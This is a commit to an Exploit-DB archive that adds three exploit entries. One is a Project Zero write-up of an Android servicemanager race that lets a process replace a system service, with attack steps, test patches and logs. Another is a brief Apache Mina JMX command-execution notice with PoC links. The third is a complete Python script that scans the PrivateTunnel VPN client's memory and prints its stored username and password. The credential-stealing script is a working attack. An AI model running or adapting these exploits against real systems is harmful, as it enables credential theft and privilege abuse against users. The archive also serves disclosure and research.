DB: 2016-09-15

3 new exploits Android - getpidcon Usage binder Service Replacement Race Condition PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure Apache Mina 2.0.13 - Remote Command Execution
2016-09-15 05:07:49 +00:00 · 2016-09-15 05:07:49 +00:00 · f1e68e0b1d
commit f1e68e0b1d
parent d5138d6962
4 changed files with 235 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -803,6 +803,7 @@ id,file,description,date,author,platform,type,port
 983,platforms/windows/dos/983.cpp,"DataTrac Activity Console - Denial of Service",2005-05-06,basher13,windows,dos,0
 984,platforms/multiple/dos/984.c,"Ethereal 0.10.10 - (dissect_ipc_state) Remote Denial of Service",2005-05-07,Nicob,multiple,dos,0
 986,platforms/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Arbitrary Code Execution",2005-05-07,"Edward Gagnon",windows,remote,0
+40381,platforms/android/dos/40381.txt,"Android - getpidcon Usage binder Service Replacement Race Condition",2016-09-14,"Google Security Research",android,dos,0
 987,platforms/windows/remote/987.c,"Hosting Controller 0.6.1 - Unauthenticated User Registration (2)",2005-05-07,Silentium,windows,remote,0
 988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service",2005-05-08,basher13,windows,dos,0
 989,platforms/php/webapps/989.pl,"PhotoPost - Arbitrary Data Remote Exploit",2005-05-13,basher13,php,webapps,0
@ -2479,6 +2480,7 @@ id,file,description,date,author,platform,type,port
 2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - (Arbitrary File Create/ Execute / Delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0
 2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 - (MKD) Remote Denial of Service",2006-11-15,"Greg Linares",windows,dos,0
 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - (libucache.dylib) Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0
+40380,platforms/windows/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",windows,local,0
 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,windows,remote,0
 2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - (manager/index.php) Local File Inclusion",2006-11-16,Revenge,php,webapps,0
 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0
@ -24997,6 +24999,7 @@ id,file,description,date,author,platform,type,port
 27891,platforms/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass",2006-05-17,"Kenneth F. Belva",hardware,remote,0
 27892,platforms/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
 27893,platforms/hardware/remote/27893.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - events.tar source_ip Parameter Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
+40382,platforms/multiple/remote/40382.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-14,"Gregory DRAPERI",multiple,remote,0
 27894,platforms/hardware/remote/27894.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - eventplayer get_image_info_abspath Parameter Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
 27895,platforms/cgi/webapps/27895.txt,"Cosmoshop 8.10.78/8.11.106 - Lshop.cgi SQL Injection",2006-05-18,l0om,cgi,webapps,0
 27896,platforms/asp/webapps/27896.txt,"ASPBB 0.5.2 - default.asp action Parameter Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps,0
--- a/platforms/android/dos/40381.txt
+++ b/platforms/android/dos/40381.txt
@ -0,0 +1,143 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=851
+
+This is very similar to forshaw's bug (<https://code.google.com/p/android/issues/detail?id=200617>, <https://bugs.chromium.org/p/project-zero/issues/detail?id=727>).
+
+The servicemanager, when determining whether the sender of a binder transaction is authorized to register a service via SVC_MGR_ADD_SERVICE, looks up the sender's SELinux context using getpidcon(spid), where spid is the value of the sender_pid field in the binder_transaction_data that was received from the binder driver.
+
+This is problematic because getpidcon($pid) is only safe to use if the caller either knows that the process originally referenced by $pid can't transition from zombie to dead (normally because it is the parent or ptracer of $pid) or if the caller can validate that the process referenced by $pid can not have spawned before $pid referred to the correct process based on the age of the process that $pid points to after the getpidcon() call. (The same thing applies to pretty much any API that refers to processes using PIDs.)
+
+This means that an attacker can, at least theoretically, register arbitrary services that would normally be provided by the system_server if he can execute / cause execution of the following operations in the right order:
+
+ - The main exploit process $exploit forks, creates process $child
+ - $child does $binder_fd = open("/dev/binder", ...)
+ - $child forks, creates process $subchild
+ - $child exits. The binder_proc belonging to $binder_fd still holds a reference
+   to $child. $child transitions to zombie status.
+ - The exploit repeatedly forks processes that instantly die until there are no unallocated
+   PIDs between ns_last_pid and $child's PID.
+ - $subchild sends a SVC_MGR_ADD_SERVICE binder message to the service manager
+ - the service manager receives the binder message. The kernel fills the
+   sender_pid field with the result of `task_tgid_nr_ns(sender, [...])`,
+   where `sender` is `t->from->proc->tsk`, the task_struct of $child.
+ - $exploit uses `waitpid()` to transition $child from zombie to dead status
+ - $exploit sends a HANDLE_APPLICATION_STRICT_MODE_VIOLATION_TRANSACTION
+   binder message to system_server
+ - system_server launches a new worker thread
+   (in ActivityManagerService.logStrictModeViolationToDropBox)
+ - the service manager calls getpidcon()
+ - system_server's worker thread dies
+
+As far as I can tell, this exploit approach contains the following race conditions:
+
+ - If $exploit calls waitpid() before the service manager has performed the binder
+   read (more accurately, before the task_tgid_nr_ns call), the service manager sees
+   PID 0. This race isn't hard to win, but it would help to have some primitive to either stall
+   the service manager after the task_tgid_nr_ns call or at least detect whether it has
+   performed the binder read. On older Android versions, voluntary_ctxt_switches
+   in /proc/$pid/status might have helped with that, but nowadays, that's blocked.
+   When this race condition fails, you'll get an SELinux denial with
+   scontext=servicemanager.
+ - If the service manager calls getpidcon() before the system_server has launched a
+   worker thread, the call will either fail (if there is no such PID) or return the
+   not-yet-reaped $child process. Again, having a primitive for stalling the service manager
+   would be useful here.
+   When this race condition fails, it will cause either an SELinux denial with
+   scontext=untrusted_app or an "failed to retrieve pid context" error from the
+   service manager.
+ - If the system_server's worker thread dies before getpidcon(), getpidcon() will fail.
+   To avoid this race, it would be very helpful to be able to spawn a thread in system_server
+   that has a controlled or at least somewhat longer lifetime.
+
+
+Because of the multiple races, it is hard to hit this bug, at least without spending days on finding ways to eliminate races or widen race windows, optimizing the exploit to not cycle through the whole pid range for every attempt and so on. Because of that, I decided to run my PoC on a patched Android build (based on android-6.0.1_r46) with the following modifications to show that, while the race window is very hard to hit, there is such a race:
+
+-------
+$ repo diff
+
+project frameworks/base/
+diff --git a/services/core/java/com/android/server/am/ActivityManagerService.java b/services/core/java/com/android/server/am/ActivityManagerService.java
+index 33d0a9f..371ecd7 100644
+--- a/services/core/java/com/android/server/am/ActivityManagerService.java
+++ b/services/core/java/com/android/server/am/ActivityManagerService.java
+@@ -12269,6 +12269,9 @@ public final class ActivityManagerService extends ActivityManagerNative
+                     if (report.length() != 0) {
+                         dbox.addText(dropboxTag, report);
+                     }
+                    try {
+                        Thread.sleep(2000);
+                    } catch (InterruptedException e) {}
+                 }
+             }.start();
+             return;
+
+project frameworks/native/
+diff --git a/cmds/servicemanager/service_manager.c b/cmds/servicemanager/service_manager.c
+index 7fa9a39..0600eb1 100644
+--- a/cmds/servicemanager/service_manager.c
+++ b/cmds/servicemanager/service_manager.c
+@@ -7,6 +7,7 @@
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <string.h>
+#include <unistd.h>
+ 
+ #include <private/android_filesystem_config.h>
+ 
+@@ -204,6 +205,9 @@ int do_add_service(struct binder_state *bs,
+     if (!handle || (len == 0) || (len > 127))
+         return -1;
+ 
+    if (uid > 1000)
+        sleep(2);
+
+     if (!svc_can_register(s, len, spid)) {
+         ALOGE("add_service('%s',%x) uid=%d - PERMISSION DENIED\n",
+              str8(s, len), handle, uid);
+-------
+
+These modifications widen the race windows sufficiently to be able to hit the bug with a few tries.
+
+On the modified build, my PoC causes the following logcat output, demonstrating that the clipboard service has been replaced successfully:
+
+06-15 21:41:00.470 11876 11876 E FIELD--FIELD: accessFlags
+06-15 21:41:00.470 11876 11876 E FIELD--FIELD: declaringClass
+06-15 21:41:00.470 11876 11876 E FIELD--FIELD: dexFieldIndex
+06-15 21:41:00.470 11876 11876 E FIELD--FIELD: offset
+06-15 21:41:00.470 11876 11876 E FIELD--FIELD: type
+06-15 21:41:00.470 11876 11876 E FIELD--FIELD: ORDER_BY_NAME_AND_DECLARING_CLASS
+06-15 21:41:00.480 11876 11876 W racer   : NATIVE CODE:  trying attack...
+06-15 21:41:01.490 11876 11876 W racer   : NATIVE CODE:  child_pid == unused_pid + 1
+06-15 21:41:01.490 11876 11876 W racer   : NATIVE CODE:  cycle_to_pid...
+06-15 21:41:02.900 11876 11876 W racer   : NATIVE CODE:  cycle_to_pid done
+06-15 21:41:04.910   992   992 E ServiceManager: SELinux: getpidcon(pid=11993) failed to retrieve pid context.
+06-15 21:41:04.910   992   992 E ServiceManager: add_service('clipboard',63) uid=10052 - PERMISSION DENIED
+06-15 21:41:08.920 11876 11876 W racer   : NATIVE CODE:  pid of last try: 11993
+06-15 21:41:08.920 11876 11876 W racer   : NATIVE CODE:  trying attack...
+06-15 21:41:09.930 11876 11876 W racer   : NATIVE CODE:  child_pid == unused_pid + 1
+06-15 21:41:09.930 11876 11876 W racer   : NATIVE CODE:  cycle_to_pid...
+06-15 21:41:11.330 11876 11876 W racer   : NATIVE CODE:  cycle_to_pid done
+06-15 21:41:13.340   992   992 E ServiceManager: add_service('clipboard',63) uid=10052 - ALREADY REGISTERED, OVERRIDE
+
+
+(Also, to further verify the success: After running the PoC, clipboard accesses in newly spawned apps cause null reference exceptions because the PoC's binder thread has been released in the meantime.)
+
+The issue was tested in the android emulator, with a aosp_x86_64-eng build of the patched android-6.0.1_r46 release.
+
+I have attached the PoC apk (with native code for aarch64 and x86_64; I'm not sure whether the PoC compiles correctly for 32bit) and the Android project tree - but as mentioned earlier, note that the PoC won't work on a build without my patches. If you want to compile it yourself, first run `aarch64-linux-gnu-gcc -static -o app/src/main/jniLibs/arm64-v8a/libracer.so racer.c -Wall -std=gnu99 && gcc -static -o app/src/main/jniLibs/x86_64/libracer.so racer.c` to compile the binaries, then build the project in Android Studio.
+
+
+I believe that the proper way to fix this issue would be to let the binder driver record the sender's SELinux context when a transaction is sent and then either let the recipient extract the current transaction's SELinux context via an ioctl or store the SELinux context in the binder message. PIDs should not be used during the SELinux context lookup.
+
+
+Regarding impact:
+
+It looks as if the vulnerable code in the service manager is reachable from isolated_app context, although being isolated is probably going to make it even more difficult to trigger the bug.
+
+After a service is replaced, already-running code should usually continue to use the old service because that reference is cached.
+
+If there is e.g. some system_app that performs permissions checks (which use the "permission" service), it might be possible to bypass such permission checks using this bug, by replacing the real permission service with one that always grants access.
+
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40381.zip
--- a/platforms/multiple/remote/40382.txt
+++ b/platforms/multiple/remote/40382.txt
@ -0,0 +1,11 @@
+Source: https://remoteawesomethoughts.blogspot.com/2016/09/apache-mina-2013-remote-command.html
+
+Apache Mina 2.0.13 uses the OGNL library in the “IoSessionFinder” class. Its constructor takes into parameter one OGNL expression. Then this expression is executed when the method “find” is called. This class seems to be only used in the JMX MINA component “IoServiceMBean”. When the IOServiceMBean is exposed trough JMX it is possible to abuse the function to execute an arbitrary command on the server.
+
+**PoC.zip**
+https://drive.google.com/open?id=0ByB_ASBOdiURbVBHMjFxeldmSDg
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40382-1.zip
+
+**MinaJMXConsole.zip**
+https://drive.google.com/file/d/0ByB_ASBOdiURQjVCTlYtREotVnM/view
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40382-2.zip
--- a/platforms/windows/local/40380.py
+++ b/platforms/windows/local/40380.py
@ -0,0 +1,78 @@
+#####
+# PrivateTunnel Client v2.7.0 (x64) Local Credentials Disclosure After Sign out Exploit
+# Tested on Windows Windows 7 64bit, English
+# Vendor Homepage 	@ https://www.privatetunnel.com
+# Date 14/09/2016
+# Bug Discovery by:
+#
+# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+# http://www.black-rose.ml
+#
+# Viktor Minin (https://www.linkedin.com/in/MininViktor)
+# https://1-33-7.com/
+#
+#####
+# PrivateTunnel Client v2.7.0 is vulnerable to local credentials disclosure after the user is logged out.
+# It seems that PrivateTunnel does store the supplied credentials while the user is logged in and after sign out in a plaintext format in memory process.
+# A potential attacker could reveal the supplied username and password in order to gain access to PrivateTunnel account.
+#
+# Authors are not responsible for any misuse or demage which caused by use of this script code.
+# Please use responsibly.
+#####
+# Proof-Of-Concept Code:
+
+import time
+import urllib
+from winappdbg import Debug, Process
+
+usr			= ''
+pwd			= ''
+found		= 0
+filename 	= "privatetunnel2.7.0.exe"
+process_pid = 0
+memory_dump	= []
+
+debug = Debug()
+try:
+	print "###########################################################################"
+	print "# PrivateTunnel v2.7.0 Local Credentials Disclosure Exploit After Sign out#"
+	print "#\t\tBug Discovery by Yakir Wizman, Victor Minin\t\t  #"
+	print "#\t\tTested on Windows Windows 7 64bit, English\t\t  #"
+	print "#\t\t\tPlease use responsibly.\t\t\t\t  #"
+	print "###########################################################################\r\n"
+	print "[~] Searching for pid by process name '%s'.." % (filename)
+	time.sleep(1)
+	debug.system.scan_processes()
+	for (process, process_name) in debug.system.find_processes_by_filename(filename):
+		process_pid = process.get_pid()
+	if process_pid is not 0:
+		print "[+] Found process with pid #%d" % (process_pid)
+		time.sleep(1)
+		print "[~] Trying to read memory for pid #%d" % (process_pid)
+		
+		process = Process(process_pid)
+		
+		user_pattern = '\x20\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x22\x20\x3A\x20\x22(.*)\x22\x2C\x0A\x20\x20\x20\x22\x75\x73\x65\x72\x6E\x61\x6D\x65\x22\x20\x3A\x20\x22(.*)\x22\x0A'
+		for address in process.search_regexp(user_pattern):
+			memory_dump.append(address)
+		
+		try:
+			usr = memory_dump[0][2].split('"username" : "')[1].replace('"\n', '')
+			pwd = memory_dump[0][2].split('"password" : "')[1].split('",')[0]
+		except:
+			pass
+		print ""
+		if usr != '' and pwd !='':
+			found = 1
+			print "[+] PrivateTunnel Credentials found!\r\n----------------------------------------"
+			print "[+] Username: %s" % usr
+			print "[+] Password: %s" % pwd
+		if found == 0:
+			print "[-] Credentials not found!"
+
+	else:
+		print "[-] No process found with name '%s'." % (filename)
+	
+	debug.loop()
+finally:
+    debug.stop()